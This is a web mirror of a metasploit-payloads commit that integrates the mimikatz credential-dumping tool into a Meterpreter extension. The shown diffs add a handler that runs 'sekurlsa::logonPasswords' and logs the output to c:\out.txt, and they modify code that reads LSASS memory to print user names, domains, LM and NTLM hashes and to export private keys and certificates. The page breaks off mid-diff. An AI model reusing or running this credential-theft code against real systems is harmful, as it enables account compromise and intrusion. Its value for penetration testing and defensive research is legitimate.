github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-01-02 11:36:22 +01:00
Code Releases Activity

Working output to file

Browse Source
This commit is contained in:
Meatballs 2013-04-20 01:26:57 +01:00
parent 39872d239b
commit 09f2085e97
37 changed files with 517 additions and 503 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
c/meterpreter/source/extensions/mimikatz/global.cpp Normal file
View File

@ -0,0 +1,4 @@
#include "global.h"
#include <iostream>
std::wostream *outputStream = &std::wcout;

2
c/meterpreter/source/extensions/mimikatz/global.h Normal file
View File

@ -0,0 +1,2 @@
#include <ostream>
extern std::wostream *outputStream;

77
c/meterpreter/source/extensions/mimikatz/main.cpp
View File

@ -1,23 +1,9 @@
#ifndef _METERPRETER_SOURCE_EXTENSION_MIMIKATZ_MIMIKATZ_H
#define _METERPRETER_SOURCE_EXTENSION_MIMIKATZ_MIMIKATZ_H
extern "C"
{
#include "../../common/common.h"
}
#endif
#include "main.h"
#include <io.h>
#include <fcntl.h>
#include <iostream>
#include <fstream>
#include "mimikatz.h"
extern "C"
{
#include "modules/mod_mimikatz_sekurlsa.h"
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
@ -30,31 +16,42 @@ extern "C"
// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
#include "../../ReflectiveDLLInjection/ReflectiveLoader.c"
// this sets the delay load hook function, see DelayLoadMetSrv.h
EnableDelayLoadMetSrv();
static string utf16toutf8(const wstring &s)
{
const int size = ::WideCharToMultiByte( CP_UTF8, 0, s.c_str(), -1, NULL, 0, 0, NULL );
vector<char> buf( size );
::WideCharToMultiByte( CP_UTF8, 0, s.c_str(), -1, &buf[0], size, 0, NULL );
return string( &buf[0] );
}
DWORD request_boiler(Remote *remote, Packet *packet)
{
Packet * response = packet_create_response(packet);
bool result = 0;
//std::wofstream logFile( "c:\\out.txt");
//std::wstreambuf *outbuf = std::wcout.rdbuf(logFile.rdbuf());
//std::wstreambuf *errbuf = std::wcerr.rdbuf(logFile.rdbuf());
bool iResult;
std::wofstream logFile("c:\\out.txt");
std::wstreambuf *outbuf = std::wcout.rdbuf(logFile.rdbuf());
outputStream = &logFile;
vector<wstring> * mesArguments = new vector<wstring>();
wstring function = (L"sekurlsa::logonPasswords");
vector<wstring> *args = new vector<wstring>();
//mimikatz * myMimiKatz = new mimikatz(mesArguments);
mimikatz * myMimiKatz = new mimikatz(args);
myMimiKatz->doCommandeLocale(&function, args);
function = (L"exit");
myMimiKatz->doCommandeLocale(&function, args);
delete myMimiKatz;
std::wcout.rdbuf(outbuf);
//http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/
//packet_add_tlv_string(response, TLV_MIMIKATZ_RESULT, res.c_str());
packet_transmit_response(iResult, remote, response);
vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider;
//result = mod_mimikatz_sekurlsa_wdigest::getWDigest(mesArguments);
/*
if (mod_mimikatz_sekurlsa::searchLSASSDatas())
{
mod_mimikatz_sekurlsa::getLogonData(mesArguments, &monProvider);
}*/
packet_transmit_response(result, remote, response);
return ERROR_SUCCESS;
}
@ -104,21 +101,3 @@ DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
return ERROR_SUCCESS;
}
}
//int wmain(int argc, wchar_t * argv[])
//{
// setlocale(LC_ALL, "French_France.65001");
// _setmode(_fileno(stdin), _O_U8TEXT/*_O_WTEXT/*_O_U16TEXT*/);
// _setmode(_fileno(stdout), _O_U8TEXT/*_O_WTEXT/*_O_U16TEXT*/);
// _setmode(_fileno(stderr), _O_U8TEXT/*_O_WTEXT/*_O_U16TEXT*/);
//
// /*SetConsoleCP(CP_UTF8);
// SetConsoleOutputCP(CP_UTF8);*/
//
// vector<wstring> * mesArguments = new vector<wstring>(argv + 1, argv + argc);
//
// mimikatz * myMimiKatz = new mimikatz(mesArguments);
// delete myMimiKatz, mesArguments;
// return ERROR_SUCCESS;
//}

22
c/meterpreter/source/extensions/mimikatz/main.h Normal file
View File

@ -0,0 +1,22 @@
#ifndef _METERPRETER_SOURCE_EXTENSION_MIMIKATZ_MIMIKATZ_H
#define _METERPRETER_SOURCE_EXTENSION_MIMIKATZ_MIMIKATZ_H
extern "C"
{
#include "../../common/common.h"
}
#endif
#include <io.h>
#include <fcntl.h>
#include <iostream>
#include <sstream>
#include "mimikatz.h"
#include "global.h"
#define TLV_TYPE_EXTENSION_MIMIKATZ 0
#define TLV_MIMIKATZ_RESULT \
MAKE_CUSTOM_TLV( \
TLV_META_TYPE_STRING, \
TLV_TYPE_EXTENSION_MIMIKATZ, \
1)

96
c/meterpreter/source/extensions/mimikatz/mimikatz.cpp
View File

@ -36,32 +36,32 @@ bool mimikatz::initLocalModules()
mimikatz::mimikatz(vector<wstring> * mesArguments) : Kmimikatz(NULL)
{
initLocalModules();
SetConsoleTitle(MIMIKATZ_FULL);
wcout << MIMIKATZ_FULL << L"\t/* Traitement du Kiwi (" << __DATE__ << L' ' << __TIME__ << L") */" << endl <<
L"// http://blog.gentilkiwi.com/mimikatz" << endl;
//SetConsoleTitle(MIMIKATZ_FULL);
//(*outputStream) << MIMIKATZ_FULL << L"\t/* Traitement du Kiwi (" << __DATE__ << L' ' << __TIME__ << L") */" << endl <<
// L"// http://blog.gentilkiwi.com/mimikatz" << endl;
bool mustContinue = true;
if(mesArguments)
{
for(vector<wstring>::iterator maCommande = mesArguments->begin(); mustContinue && (maCommande != mesArguments->end()); maCommande++)
{
wstring commande = *maCommande;
wcout << endl << MIMIKATZ << L"(commandline) # " << dec << commande << endl;
mustContinue = tryToDispatch(&commande);
}
}
//bool mustContinue = true;
//if(mesArguments)
//{
// for(vector<wstring>::iterator maCommande = mesArguments->begin(); mustContinue && (maCommande != mesArguments->end()); maCommande++)
// {
// wstring commande = *maCommande;
// (*outputStream) << endl << MIMIKATZ << L"(commandline) # " << dec << commande << endl;
// mustContinue = tryToDispatch(&commande);
// }
//}
if(mustContinue)
{
wstring * monBuffer = new wstring();
do
{
wcout << endl << MIMIKATZ << L" # " << dec;
getline(wcin, *monBuffer);
} while(tryToDispatch(monBuffer));
delete monBuffer;
}
wcout.flush();
//if(mustContinue)
//{
// wstring * monBuffer = new wstring();
// do
// {
// (*outputStream) << endl << MIMIKATZ << L" # " << dec;
// getline(wcin, *monBuffer);
// } while(tryToDispatch(monBuffer));
// delete monBuffer;
//}
//(*outputStream).flush();
}
mimikatz::~mimikatz(void)
@ -128,17 +128,17 @@ bool mimikatz::doCommandeLocale(wstring * fonction, vector<wstring> * arguments)
}
}
if(module.empty()) wcout << L"Commande locale \'" << commande << L"\' introuvable" << endl;
else wcout << L"Module : \'" << module << L"\' identifié, mais commande \'" << commande << L"\' introuvable" << endl;
if(module.empty()) (*outputStream) << L"Commande locale \'" << commande << L"\' introuvable" << endl;
else (*outputStream) << L"Module : \'" << module << L"\' identifié, mais commande \'" << commande << L"\' introuvable" << endl;
wcout << endl << L"Description du module : " << monModule->description << endl;
(*outputStream) << endl << L"Description du module : " << monModule->description << endl;
listCommandes(monModule);
return true;
}
}
wcout << L"Module : \'" << module << L"\' introuvable" << endl << endl << L"Modules disponibles : " << endl;
(*outputStream) << L"Module : \'" << module << L"\' introuvable" << endl << endl << L"Modules disponibles : " << endl;
listModules();
return true;
}
@ -149,14 +149,14 @@ bool mimikatz::openKernel()
if(!Kmimikatz || Kmimikatz == INVALID_HANDLE_VALUE)
{
wcout << L"Ouverture du pilote mimikatz : ";
(*outputStream) << L"Ouverture du pilote mimikatz : ";
Kmimikatz = CreateFile(L"\\\\.\\mimikatz", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
if(reussite = (Kmimikatz && Kmimikatz != INVALID_HANDLE_VALUE))
wcout << L"OK";
(*outputStream) << L"OK";
else
wcout << L"CreateFile ; " << mod_system::getWinError();
wcout << endl;
(*outputStream) << L"CreateFile ; " << mod_system::getWinError();
(*outputStream) << endl;
}
else
{
@ -188,41 +188,41 @@ bool mimikatz::doCommandeKernel(std::wstring &commande)
{
DWORD dwReturn;
/*
wcout << L"DEBUG WriteFile " << endl <<
(*outputStream) << L"DEBUG WriteFile " << endl <<
L"\tToWrite : " << (commande.size() + 1) * sizeof(wchar_t) << endl;
*/
if(WriteFile(Kmimikatz, commande.c_str(), (commande.size() + 1) * sizeof(wchar_t), &dwReturn, NULL))
{
/*wcout << L"\tWriten : " << dwReturn << endl << endl;*/
/*(*outputStream) << L"\tWriten : " << dwReturn << endl << endl;*/
DWORD dwBuff = 0x40000;
DWORD dwRead = 0;
BYTE * buffer = new BYTE[dwBuff];
RtlZeroMemory(buffer, dwBuff);
/*wcout << L"DEBUG ReadFile " << endl <<
/*(*outputStream) << L"DEBUG ReadFile " << endl <<
L"\tBuffSize : " << dwBuff << endl;*/
if(ReadFile(Kmimikatz, buffer, dwBuff, &dwRead, NULL))
{
/*wcout <<
/*(*outputStream) <<
L"\tReaded : " << dwRead << endl <<
endl;
*/
wcout /*<< L"BUFF : " << endl*/
(*outputStream) /*<< L"BUFF : " << endl*/
<< reinterpret_cast<wchar_t *>(buffer) << endl;
}
else wcout << L"ReadFile : " << mod_system::getWinError() << endl;
else (*outputStream) << L"ReadFile : " << mod_system::getWinError() << endl;
delete[] buffer;
}
else wcout << L"WriteFile : " << mod_system::getWinError() << endl;
else (*outputStream) << L"WriteFile : " << mod_system::getWinError() << endl;
}
else wcout << L"Impossible de communiquer avec le pilote mimikatz";
else (*outputStream) << L"Impossible de communiquer avec le pilote mimikatz";
}
else
{
wcout << L"Commande vide (fermeture forcée) reçue" << endl;
(*outputStream) << L"Commande vide (fermeture forcée) reçue" << endl;
closeKernel();
}
@ -246,21 +246,21 @@ bool mimikatz::doCommandeDistante(std::wstring &commande)
{
if(commOk = mod_mimikatz_inject::monCommunicator->readFromPipe(buffer))
{
wcout << buffer.substr(1) ;
(*outputStream) << buffer.substr(1) ;
}
else
{
wcout << L"Erreur : pas de réponse possible ; " << mod_system::getWinError() << endl;
(*outputStream) << L"Erreur : pas de réponse possible ; " << mod_system::getWinError() << endl;
break;
}
} while(*(buffer.begin()) == L'#');
}
else wcout << L"Erreur : pas d\'écriture possible ; " << mod_system::getWinError() << endl;
else (*outputStream) << L"Erreur : pas d\'écriture possible ; " << mod_system::getWinError() << endl;
}
}
else wcout << L"Commande vide (déconnexion forcée) reçue" << endl;
else (*outputStream) << L"Commande vide (déconnexion forcée) reçue" << endl;
}
else wcout << L"Erreur : pas ou plus de communication établie" << endl;
else (*outputStream) << L"Erreur : pas ou plus de communication établie" << endl;
if(!commOk)
mod_mimikatz_inject::closeThisCommunicator();
@ -272,7 +272,7 @@ void mimikatz::listModules()
{
for(vector<KIWI_MIMIKATZ_LOCAL_MODULE>::iterator monModule = mesModules.begin(); monModule != mesModules.end(); monModule++)
{
wcout << setw(12) << setfill(wchar_t(' ')) << monModule->module << L"\t- " << monModule->description << endl;
(*outputStream) << setw(12) << setfill(wchar_t(' ')) << monModule->module << L"\t- " << monModule->description << endl;
}
}
@ -281,6 +281,6 @@ void mimikatz::listCommandes(vector<KIWI_MIMIKATZ_LOCAL_MODULE>::iterator monMod
for(vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND>::iterator maCommande = monModule->commandes.begin(); maCommande != monModule->commandes.end(); maCommande++)
{
if(maCommande->commandName.front() != L':')
wcout << setw(12) << setfill(wchar_t(' ')) << maCommande->commandName << L"\t- " << maCommande->commandHelp << endl;
(*outputStream) << setw(12) << setfill(wchar_t(' ')) << maCommande->commandName << L"\t- " << maCommande->commandHelp << endl;
}
}

2
c/meterpreter/source/extensions/mimikatz/mimikatz.h
View File

@ -33,7 +33,7 @@
class mimikatz
{
private:
public:
static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands();
vector<KIWI_MIMIKATZ_LOCAL_MODULE> mesModules;
bool initLocalModules();

2
c/meterpreter/source/extensions/mimikatz/modules/LSA Keys/keys_nt5.cpp
View File

@ -60,7 +60,7 @@ bool mod_mimikatz_sekurlsa_keys_nt5::searchAndInitLSASSData()
mesSucces++;
}
}
else wcout << L"mod_memory::searchMemory NT5 " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_memory::searchMemory NT5 " << mod_system::getWinError() << endl;
return (mesSucces == 6);
}

4
c/meterpreter/source/extensions/mimikatz/modules/LSA Keys/keys_nt6.cpp
View File

@ -112,9 +112,9 @@ bool mod_mimikatz_sekurlsa_keys_nt6::searchAndInitLSASSData()
if(mod_memory::readMemory(reinterpret_cast<PBYTE>(maCle.cle) + FIELD_OFFSET(KIWI_BCRYPT_KEY_DATA, data), &(*h3DesKey)->cle->data, maCleData.size - FIELD_OFFSET(KIWI_BCRYPT_KEY_DATA, data), mod_mimikatz_sekurlsa::hLSASS))
mesSucces++;
}
else wcout << L"LsaInitializeProtectedMemory NT6 KO" << endl;
else (*outputStream) << L"LsaInitializeProtectedMemory NT6 KO" << endl;
}
else wcout << L"mod_memory::searchMemory NT6 " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_memory::searchMemory NT6 " << mod_system::getWinError() << endl;
return (mesSucces == 3);
}

2
c/meterpreter/source/extensions/mimikatz/modules/Security Packages/kerberos.cpp
View File

@ -128,7 +128,7 @@ bool WINAPI mod_mimikatz_sekurlsa_kerberos::getKerberosLogonData(__in PLUID logI
mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity);
delete [] monBuff;
}
else wcout << L"n.a. (kerberos KO)";
else (*outputStream) << L"n.a. (kerberos KO)";
return true;
}

4
c/meterpreter/source/extensions/mimikatz/modules/Security Packages/livessp.cpp
View File

@ -58,12 +58,12 @@ bool WINAPI mod_mimikatz_sekurlsa_livessp::getLiveSSPLogonData(__in PLUID logId,
if(mod_memory::readMemory(pLogSession->suppCreds, monBuffC, sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL), mod_mimikatz_sekurlsa::hLSASS))
mesCreds = &(reinterpret_cast<PKIWI_LIVESSP_PRIMARY_CREDENTIAL>(monBuffC)->credentials);
}
else wcout << L"n.s. (SuppCred KO) / ";
else (*outputStream) << L"n.s. (SuppCred KO) / ";
}
}
mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity, true);
delete [] monBuffC, monBuffP;
}
else wcout << L"n.a. (livessp KO)";
else (*outputStream) << L"n.a. (livessp KO)";
return true;
}

22
c/meterpreter/source/extensions/mimikatz/modules/Security Packages/msv1_0.cpp
View File

@ -153,26 +153,26 @@ bool WINAPI mod_mimikatz_sekurlsa_msv1_0::getMSVLogonData(__in PLUID logId, __in
if(mod_memory::readMemory(mesCreds->PrimaryCredentials, kiwiMSVPrimaryCredentials, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS), mod_mimikatz_sekurlsa::hLSASS))
{
decryptAndDisplayCredsBlock(&reinterpret_cast<PKIWI_MSV1_0_PRIMARY_CREDENTIALS>(kiwiMSVPrimaryCredentials)->Credentials, justSecurity);
} else wcout << L"n.e. (Lecture KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)";
} else (*outputStream) << L"n.e. (Lecture KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)";
delete [] kiwiMSVPrimaryCredentials;
} else wcout << L"n.s. (PrimaryCredentials KO)";
} else (*outputStream) << L"n.s. (PrimaryCredentials KO)";
}else wcout << L"n.e. (Lecture KIWI_MSV1_0_CREDENTIALS KO)";
}else (*outputStream) << L"n.e. (Lecture KIWI_MSV1_0_CREDENTIALS KO)";
delete [] kiwiMSVCredentials;
} else wcout << L"n.s. (Credentials KO)";
} else (*outputStream) << L"n.s. (Credentials KO)";
} else wcout << L"n.e. (Lecture KIWI_MSV1_0_LIST KO)";
} else (*outputStream) << L"n.e. (Lecture KIWI_MSV1_0_LIST KO)";
delete [] kiwiMSVListEntry;
break;
}
}
if(!pLogSession)
wcout << L"n.t. (LUID KO)";
(*outputStream) << L"n.t. (LUID KO)";
}
else wcout << L"n.a. (msv1_0 KO)";
else (*outputStream) << L"n.a. (msv1_0 KO)";
return true;
}
@ -193,19 +193,19 @@ bool mod_mimikatz_sekurlsa_msv1_0::decryptAndDisplayCredsBlock(LSA_UNICODE_STRIN
wstring ntHash = mod_text::stringOfHex(mesCreds->NtOwfPassword, sizeof(mesCreds->NtOwfPassword));
if(justSecurity)
wcout << L"lm{ " << lmHash << L" }, ntlm{ " << ntHash << L" }";
(*outputStream) << L"lm{ " << lmHash << L" }, ntlm{ " << ntHash << L" }";
else
{
wcout << endl <<
(*outputStream) << endl <<
L"\t * Utilisateur : " << mod_text::stringOfSTRING(mesCreds->UserName) << endl <<
L"\t * Domaine : " << mod_text::stringOfSTRING(mesCreds->LogonDomainName) << endl <<
L"\t * Hash LM : " << lmHash << endl <<
L"\t * Hash NTLM : " << ntHash;
}
} else wcout << L"n.e. (Lecture Block Credentials KO)";
} else (*outputStream) << L"n.e. (Lecture Block Credentials KO)";
delete [] monBuffer;
} else wcout << L"n.s. (Block Credentials KO)";
} else (*outputStream) << L"n.s. (Block Credentials KO)";
return true;
}

2
c/meterpreter/source/extensions/mimikatz/modules/Security Packages/ssp.cpp
View File

@ -85,7 +85,7 @@ bool WINAPI mod_mimikatz_sekurlsa_ssp::getSSPLogonData(__in PLUID logId, __in bo
}
}
}
else wcout << L"n.a. (SSP KO)";
else (*outputStream) << L"n.a. (SSP KO)";
return true;
}

4
c/meterpreter/source/extensions/mimikatz/modules/Security Packages/tspkg.cpp
View File

@ -82,12 +82,12 @@ bool WINAPI mod_mimikatz_sekurlsa_tspkg::getTsPkgLogonData(__in PLUID logId, __i
if(mod_memory::readMemory(pLogSession->pTsPrimary, monBuffC, sizeof(KIWI_TS_PRIMARY_CREDENTIAL), mod_mimikatz_sekurlsa::hLSASS))
mesCreds = &(reinterpret_cast<PKIWI_TS_PRIMARY_CREDENTIAL>(monBuffC)->credentials);
}
else wcout << L"n.s. (SuppCred KO) / ";
else (*outputStream) << L"n.s. (SuppCred KO) / ";
}
}
mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity, true);
delete [] monBuffC, monBuffP;
}
else wcout << L"n.a. (tspkg KO)";
else (*outputStream) << L"n.a. (tspkg KO)";
return true;
}

2
c/meterpreter/source/extensions/mimikatz/modules/Security Packages/wdigest.cpp
View File

@ -84,7 +84,7 @@ bool WINAPI mod_mimikatz_sekurlsa_wdigest::getWDigestLogonData(__in PLUID logId,
mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity);
delete [] monBuff;
}
else wcout << L"n.a. (wdigest KO)";
else (*outputStream) << L"n.a. (wdigest KO)";
return true;
}

1
c/meterpreter/source/extensions/mimikatz/modules/globdefs.h
View File

@ -10,6 +10,7 @@
#include <ntsecapi.h>
#include <string>
#include <vector>
#include "../global.h"
using namespace std;
#define SECURITY_WIN32

100
c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_crypto.cpp
View File

@ -23,23 +23,23 @@ bool mod_mimikatz_crypto::listProviders(vector<wstring> * arguments)
{
vector<wstring> * monVectorProviders = new vector<wstring>();
/* CryptoAPI */
wcout << L"Providers CryptoAPI :" << endl;
(*outputStream) << L"Providers CryptoAPI :" << endl;
if(mod_cryptoapi::getVectorProviders(monVectorProviders))
for(vector<wstring>::iterator monProvider = monVectorProviders->begin(); monProvider != monVectorProviders->end(); monProvider++)
wcout << L'\t' << *monProvider << endl;
else wcout << L"mod_cryptoapi::getVectorProviders : " << mod_system::getWinError() << endl;
(*outputStream) << L'\t' << *monProvider << endl;
else (*outputStream) << L"mod_cryptoapi::getVectorProviders : " << mod_system::getWinError() << endl;
/* CryptoNG */
if(mod_cryptong::isNcrypt)
{
wcout << endl;
(*outputStream) << endl;
monVectorProviders->clear();
wcout << L"Providers CNG :" << endl;
(*outputStream) << L"Providers CNG :" << endl;
if(mod_cryptong::getVectorProviders(monVectorProviders))
for(vector<wstring>::iterator monProvider = monVectorProviders->begin(); monProvider != monVectorProviders->end(); monProvider++)
wcout << L'\t' << *monProvider << endl;
else wcout << L"mod_cryptong::getVectorProviders : " << mod_system::getWinError() << endl;
(*outputStream) << L'\t' << *monProvider << endl;
else (*outputStream) << L"mod_cryptong::getVectorProviders : " << mod_system::getWinError() << endl;
}
delete monVectorProviders;
return true;
@ -61,20 +61,20 @@ bool mod_mimikatz_crypto::listStores(vector<wstring> * arguments)
{
wstring monEmplacement = (arguments->empty() ? L"CERT_SYSTEM_STORE_CURRENT_USER" : arguments->front());
wcout << L"Emplacement : \'" << monEmplacement << L'\'';
(*outputStream) << L"Emplacement : \'" << monEmplacement << L'\'';
DWORD systemStore;
if(mod_crypto::getSystemStoreFromString(monEmplacement, &systemStore))
{
wcout << endl;
(*outputStream) << endl;
vector<wstring> * mesStores = new vector<wstring>();
if(mod_crypto::getVectorSystemStores(mesStores, systemStore))
for(vector<wstring>::iterator monStore = mesStores->begin(); monStore != mesStores->end(); monStore++)
wcout << L'\t' << *monStore << endl;
else wcout << L"mod_crypto::getListSystemStores : " << mod_system::getWinError() << endl;
(*outputStream) << L'\t' << *monStore << endl;
else (*outputStream) << L"mod_crypto::getListSystemStores : " << mod_system::getWinError() << endl;
delete mesStores;
}
else wcout << L" introuvable !" << endl;
else (*outputStream) << L" introuvable !" << endl;
return true;
}
@ -110,7 +110,7 @@ void mod_mimikatz_crypto::listAndOrExportKeys(vector<wstring> * arguments, bool
mod_cryptoapi::getProviderTypeFromString(arguments->back(), &providerType);
break;
default :
wcout << L"Erreur d\'arguments, attendu : [machine] [provider providerType]" << endl;
(*outputStream) << L"Erreur d\'arguments, attendu : [machine] [provider providerType]" << endl;
return;
}
@ -120,14 +120,14 @@ void mod_mimikatz_crypto::listAndOrExportKeys(vector<wstring> * arguments, bool
vector<wstring> * monVectorKeys = new vector<wstring>();
/* CryptoAPI */
wcout << L"[" << type << L"] Clés CryptoAPI :" << endl;
(*outputStream) << L"[" << type << L"] Clés CryptoAPI :" << endl;
if(mod_cryptoapi::getVectorContainers(monVectorKeys, isMachine))
{
DWORD i;
vector<wstring>::iterator monContainer;
for(i = 0, monContainer = monVectorKeys->begin(); monContainer != monVectorKeys->end(); monContainer++, i++)
{
wcout << L"\t - " << *monContainer << endl;
(*outputStream) << L"\t - " << *monContainer << endl;
HCRYPTPROV hCryptKeyProv = NULL;
if(CryptAcquireContext(&hCryptKeyProv, monContainer->c_str(), provider.c_str(), providerType, NULL | (isMachine ? CRYPT_MACHINE_KEYSET : NULL)))
@ -137,12 +137,12 @@ void mod_mimikatz_crypto::listAndOrExportKeys(vector<wstring> * arguments, bool
{
if(CryptGetUserKey(hCryptKeyProv, ks, &maCle))
{
wcout << L"\t\tType : " << mod_crypto::KeyTypeToString(ks) << endl;
(*outputStream) << L"\t\tType : " << mod_crypto::KeyTypeToString(ks) << endl;
DWORD param = 0, taille = sizeof(param);
if(CryptGetKeyParam(maCle, KP_PERMISSIONS, reinterpret_cast<BYTE *>(&param), &taille, NULL))
wcout << L"\t\tExportabilité : " << (param & CRYPT_EXPORT ? L"OUI" : L"NON") << endl;
(*outputStream) << L"\t\tExportabilité : " << (param & CRYPT_EXPORT ? L"OUI" : L"NON") << endl;
if(CryptGetKeyParam(maCle, KP_KEYLEN, reinterpret_cast<BYTE *>(&param), &taille, NULL))
wcout << L"\t\tTaille clé : " << param << endl;
(*outputStream) << L"\t\tTaille clé : " << param << endl;
if(exportKeys)
{
@ -162,10 +162,10 @@ void mod_mimikatz_crypto::listAndOrExportKeys(vector<wstring> * arguments, bool
delete[] monExport;
}
wcout << L"\t\tExport privé dans \'" << monBuff.str() << L"\' : " << (reussite ? L"OK" : L"KO") << endl;
(*outputStream) << L"\t\tExport privé dans \'" << monBuff.str() << L"\' : " << (reussite ? L"OK" : L"KO") << endl;
if(!reussite)
{
wcout << L"\t\t\tmod_cryptoapi::getPrivateKey/PrivateKeyBlobToPVK : " << mod_system::getWinError() << endl;
(*outputStream) << L"\t\t\tmod_cryptoapi::getPrivateKey/PrivateKeyBlobToPVK : " << mod_system::getWinError() << endl;
}
}
}
@ -174,30 +174,30 @@ void mod_mimikatz_crypto::listAndOrExportKeys(vector<wstring> * arguments, bool
if(maCle)
CryptDestroyKey(maCle);
else
wcout << L"\t\t* Erreur de clé ; " << mod_system::getWinError() << endl;
(*outputStream) << L"\t\t* Erreur de clé ; " << mod_system::getWinError() << endl;
CryptReleaseContext(hCryptKeyProv, 0);
}
else wcout << L"\t\t* Erreur d\'acquisition de la clé ; " << mod_system::getWinError() << endl;
else (*outputStream) << L"\t\t* Erreur d\'acquisition de la clé ; " << mod_system::getWinError() << endl;
}
}
else wcout << L"mod_cryptoapi::getVectorContainers : " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_cryptoapi::getVectorContainers : " << mod_system::getWinError() << endl;
/* CryptoNG */
if(mod_cryptong::isNcrypt)
{
wcout << endl;
(*outputStream) << endl;
monVectorKeys->clear();
wcout << L"[" << type << L"] Clés CNG :" << endl;
(*outputStream) << L"[" << type << L"] Clés CNG :" << endl;
if(mod_cryptong::getVectorContainers(monVectorKeys, isMachine))
{
DWORD i;
vector<wstring>::iterator monContainer;
for(i = 0, monContainer = monVectorKeys->begin(); monContainer != monVectorKeys->end(); monContainer++, i++)
{
wcout << L"\t - " << *monContainer << endl;
(*outputStream) << L"\t - " << *monContainer << endl;
NCRYPT_KEY_HANDLE maCle;
if(mod_cryptong::getHKeyFromName(*monContainer, &maCle, isMachine))
@ -206,9 +206,9 @@ void mod_mimikatz_crypto::listAndOrExportKeys(vector<wstring> * arguments, bool
DWORD size = 0;
if(mod_cryptong::isKeyExportable(&maCle, &exportable))
wcout << L"\t\tExportabilité : " << (exportable ? L"OUI" : L"NON") << endl;
(*outputStream) << L"\t\tExportabilité : " << (exportable ? L"OUI" : L"NON") << endl;
if(mod_cryptong::getKeySize(&maCle, &size))
wcout << L"\t\tTaille clé : " << size << endl;
(*outputStream) << L"\t\tTaille clé : " << size << endl;
if(exportKeys)
{
@ -225,17 +225,17 @@ void mod_mimikatz_crypto::listAndOrExportKeys(vector<wstring> * arguments, bool
delete[] monExport;
}
wcout << L"\t\tExport privé dans \'" << monBuff.str() << L"\' : " << (reussite ? L"OK" : L"KO") << endl;
(*outputStream) << L"\t\tExport privé dans \'" << monBuff.str() << L"\' : " << (reussite ? L"OK" : L"KO") << endl;
if(!reussite)
{
wcout << L"\t\t\tmod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : " << mod_system::getWinError() << endl;
(*outputStream) << L"\t\t\tmod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : " << mod_system::getWinError() << endl;
}
}
mod_cryptong::NCryptFreeObject(maCle);
}
}
}
else wcout << L"mod_cryptong::getVectorContainers : " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_cryptong::getVectorContainers : " << mod_system::getWinError() << endl;
}
delete monVectorKeys;
@ -257,12 +257,12 @@ void mod_mimikatz_crypto::listAndOrExportCertificates(vector<wstring> * argument
monStore = arguments->back();
}
wcout << L"Emplacement : \'" << monEmplacement << L'\'';
(*outputStream) << L"Emplacement : \'" << monEmplacement << L'\'';
DWORD systemStore;
if(mod_crypto::getSystemStoreFromString(monEmplacement, &systemStore))
{
wcout << L"\\" << monStore << endl;
(*outputStream) << L"\\" << monStore << endl;
if(HCERTSTORE hCertificateStore = CertOpenStore(CERT_STORE_PROV_SYSTEM, NULL, NULL, systemStore | CERT_STORE_OPEN_EXISTING_FLAG | CERT_STORE_READONLY_FLAG, monStore.c_str()))
{
DWORD i;
@ -275,7 +275,7 @@ void mod_mimikatz_crypto::listAndOrExportCertificates(vector<wstring> * argument
if(!mod_crypto::getCertNameFromCertCTX(pCertContext, certName))
certName->assign(L"[empty]");
wcout << L"\t - " << *certName << endl;;
(*outputStream) << L"\t - " << *certName << endl;;
sanitizeFileName(certName);
wstringstream monBuff;
@ -284,8 +284,8 @@ void mod_mimikatz_crypto::listAndOrExportCertificates(vector<wstring> * argument
mod_crypto::KIWI_KEY_PROV_INFO keyProvInfo;
if(mod_crypto::getKiwiKeyProvInfo(pCertContext, &keyProvInfo))
{
wcout << L"\t\tContainer Clé : " << keyProvInfo.pwszContainerName << endl;
wcout << L"\t\tProvider : " << keyProvInfo.pwszProvName << endl;
(*outputStream) << L"\t\tContainer Clé : " << keyProvInfo.pwszContainerName << endl;
(*outputStream) << L"\t\tProvider : " << keyProvInfo.pwszProvName << endl;
HCRYPTPROV_OR_NCRYPT_KEY_HANDLE monProv = NULL;
DWORD keySpec = 0;
@ -293,7 +293,7 @@ void mod_mimikatz_crypto::listAndOrExportCertificates(vector<wstring> * argument
if(CryptAcquireCertificatePrivateKey(pCertContext, CRYPT_ACQUIRE_ALLOW_NCRYPT_KEY_FLAG /* CRYPT_ACQUIRE_SILENT_FLAG NULL */, NULL, &monProv, &keySpec, &aFermer))
{
wcout << L"\t\tType : " << mod_crypto::KeyTypeToString(keySpec) << endl;
(*outputStream) << L"\t\tType : " << mod_crypto::KeyTypeToString(keySpec) << endl;
DWORD size = 0;
bool exportable = false;
@ -310,7 +310,7 @@ void mod_mimikatz_crypto::listAndOrExportCertificates(vector<wstring> * argument
mod_cryptong::NCryptFreeObject(monProv);
}
}
else wcout << L"\t\t\tErreur : Clé de type nCrypt, sans nCrypt ?" << endl;
else (*outputStream) << L"\t\t\tErreur : Clé de type nCrypt, sans nCrypt ?" << endl;
}
else
{
@ -334,8 +334,8 @@ void mod_mimikatz_crypto::listAndOrExportCertificates(vector<wstring> * argument
}
if(reussite)
{
